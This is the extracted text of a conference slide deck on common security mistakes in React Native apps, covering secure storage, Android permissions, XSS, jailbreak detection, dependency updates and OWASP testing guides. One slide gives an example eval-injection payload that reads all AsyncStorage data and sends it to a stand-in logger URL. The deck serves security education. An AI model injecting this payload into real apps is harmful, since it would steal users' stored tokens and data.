Name Surname Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium something.org Julia Potapenko React Native Security Addressing Typical Mistakes Let's shed light on React Native apps’ security and explain some risks and threats developers should address to prevent typical mistakes. @julepka cossacklabs.com

Name Surname Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium something.org Julia Potapenko About me 👩💻 Security Software Engineer at Cossack Labs Leader of OWASP Zhytomyr Chapter, Ukraine 🇺🇦 ❤︎ OWASP MASVS/MSTG Project @julepka cossacklabs.com We help companies to protect their sensitive and valuable data.

React Native Security. Addressing Typical Mistakes We will talk about Architecture Platforms usage Dependencies Security testing

React Native Security. Addressing Typical Mistakes “Choosing React Native and its components means that you understand and accept potential security consequences.”

React Native Security. Addressing Typical Mistakes Architecture basics React Native is a cross-platform solution from Facebook that allows writing native apps using React (JavaScript or TypeScript).

React Native Security. Addressing Typical Mistakes Trusting third parties Native platforms = Apple and Google React Native = Facebook TypeScript = Microsoft

React Native Security. Addressing Typical Mistakes Trusting third parties Native platforms = Apple and Google React Native = Facebook TypeScript = Microsoft

React Native Security. Addressing Typical Mistakes Trusting third parties Native platforms = Apple and Google React Native = Facebook TypeScript = Microsoft CVE-2020-1911 CVE-2020-1912 CVE-2020-1913

React Native Security. Addressing Typical Mistakes “With React Native, developers deal with security for all three platforms: iOS, Android and React Native.”

React Native Security. Addressing Typical Mistakes OWASP Mobile Top 10 #1 Improper Platform Usage

React Native Security. Addressing Typical Mistakes React Native is a leaky abstraction @vixentael

Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data stored encrypted Yes Yes React Native Security. Addressing Typical Mistakes

Secure Store Example iOS Android Keychain SharedPreferences + KeyStore Data stored encrypted Yes Yes Data persists across app reinstalls Yes No Hardware-backed encryption Yes Depends on device vendor Data decrypted only before usage Decrypted when device unlocked Yes React Native Security. Addressing Typical Mistakes

Managing Android Permissions React Native Security. Addressing Typical Mistakes

Managing Android Permissions React Native Security. Addressing Typical Mistakes Android: You can add permissions in multiple files + React Native: It is common practice to use third-party solutions

Managing Android Permissions React Native Security. Addressing Typical Mistakes Android: You can add permissions in multiple files + React Native: It is common practice to use third-party solutions = 💥🤯💥 I don’t need this permission The app crashes if I delete it

Is XSS possible? React Native Security. Addressing Typical Mistakes XSS possibility is decreases by design.

Is XSS possible? React Native Security. Addressing Typical Mistakes XSS possibility is decreases by design. XSS is still possible. eval() _reactNative.AsyncStorage.getAllKeys(function(err,result) {_reactNative.AsyncStorage.multiGet(result,function(err,result ) {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});}); Steal all the data from local storage (AsyncStorage) by exploiting eval- based injection and accessing React Native APIs

Jailbreak and Root detection React Native Security. Addressing Typical Mistakes It is never easy for regular iOS and Android teams.

Jailbreak and Root detection React Native Security. Addressing Typical Mistakes It is never easy for regular iOS and Android teams. There are no ready to go React Native solutions: a. implement on your own b. use third-party solutions for each platform and write bridging code

Jailbreak and Root detection React Native Security. Addressing Typical Mistakes It is never easy for regular iOS and Android teams. There are no ready to go React Native solutions: a. implement on your own b. use third-party solutions for each platform and write bridging code Example: IOSSecuritySuite https://github.com/securing/IOSSecuritySuite Swift ➤ Objective-C ➤ React Native

React Native Security. Addressing Typical Mistakes “50 shades of dependencies”

A typical situation React Native Security. Addressing Typical Mistakes

A typical situation React Native Security. Addressing Typical Mistakes They’ve updated dependencies half year later…

Monitoring dependencies React Native Security. Addressing Typical Mistakes 🤯 So many dependencies Additional CI work One update triggers another update Integrating dependency checkers Updates may be incompatible What if there is no fix for vulnerability? Architectural changes required Tight deadlines

What if there is no fix? React Native Security. Addressing Typical Mistakes ✅ Learn more about the issue, its scope ✅ Document it, make the team aware ✅ Monitor it and book the time for the update

Plan time carefully! React Native Security. Addressing Typical Mistakes ➡ iOS or Android update ➡ React Native update ➡ Forked version update ➡ Dependencies update ➡ Mobile app source code update

React Native Security. Addressing Typical Mistakes Security testing of React Native apps

React Native Security. Addressing Typical Mistakes OWASP MASVS Mobile Application Security Verification Standard https://github.com/OWASP/owasp-masvs Mobile Security Testing Guide https://github.com/OWASP/owasp-mstg OWASP MSTG

React Native Security. Addressing Typical Mistakes OWASP MASVS Mobile Application Security Verification Standard https://github.com/OWASP/owasp-masvs Mobile Security Testing Guide https://github.com/OWASP/owasp-mstg OWASP MSTG “Please note that the MSTG focuses primarily on native apps. These are apps built with Java or Kotlin using the Android SDK for Android or built with Swift or Objective-C using the Apple SDKs for iOS. Apps using frameworks such as Nativescript, React- native, Xamarin, Cordova, etc. are not within the main focus of the MSTG. However, some essential controls, such as certificate pinning, have been explained already for some of these platforms.”

You can still use MASVS! React Native Security. Addressing Typical Mistakes OWASP MASVS is language agnostic. All requirements are relevant for React Native apps because they are “native” under the hood.

React Native Security. Addressing Typical Mistakes General ideas will be similar. You either look for similar JavaScript implementation or native code with bridging functions. You can still use MSTG!

How do we test RN app security? React Native Security. Addressing Typical Mistakes 1. Use MASVS requirements. 2. Review JavaScript dependencies’ source code to understand native controls behind it. You need to be able to read all the languages: JavaScript (TypeScript), Objective-C (Swift), Java (Kotlin). 3. Use ASVS and WSTG to cover JavaScript-specific vulnerabilities like XSS.

Final thoughts… React Native Security. Addressing Typical Mistakes “Learn once, write anywhere.”

Final thoughts… React Native Security. Addressing Typical Mistakes “Learn once, write anywhere.” “Learn once, ask mobile security people for help.”

Where to go next? React Native Security. Addressing Typical Mistakes My React Native Security Article https://www.cossacklabs.com/blog/react-native-app-security.html React Native Security Guide https://reactnative.dev/docs/security OWASP MASVS Hybrid Apps discussion https://github.com/OWASP/owasp-masvs/discussions/557

Thank you! @julepka